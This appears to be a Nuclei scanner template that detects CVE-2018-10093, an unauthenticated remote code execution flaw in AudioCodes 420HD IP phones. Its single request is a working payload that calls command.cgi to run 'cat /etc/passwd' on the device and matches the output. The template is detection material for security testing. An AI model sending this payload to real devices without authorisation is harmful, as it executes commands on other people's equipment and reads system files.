id: CVE-2018-10093 info: name: AudioCode 420HD - Remote Code Execution author: wisnupramoedya severity: high description: | AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution. reference: - https://www.exploit-db.com/exploits/46164 - https://nvd.nist.gov/vuln/detail/CVE-2018-10093 - https://www.exploit-db.com/exploits/46164/ - http://seclists.org/fulldisclosure/2019/Jan/38 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2018-10093 cwe-id: CWE-862 tags: cve,cve2018,rce,iot,audiocode requests: - method: GET path: - "{{BaseURL}}/command.cgi?cat%20/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "admin:.*:*sh$" - type: status status: - 200 # Enhanced by mp on 2022/06/19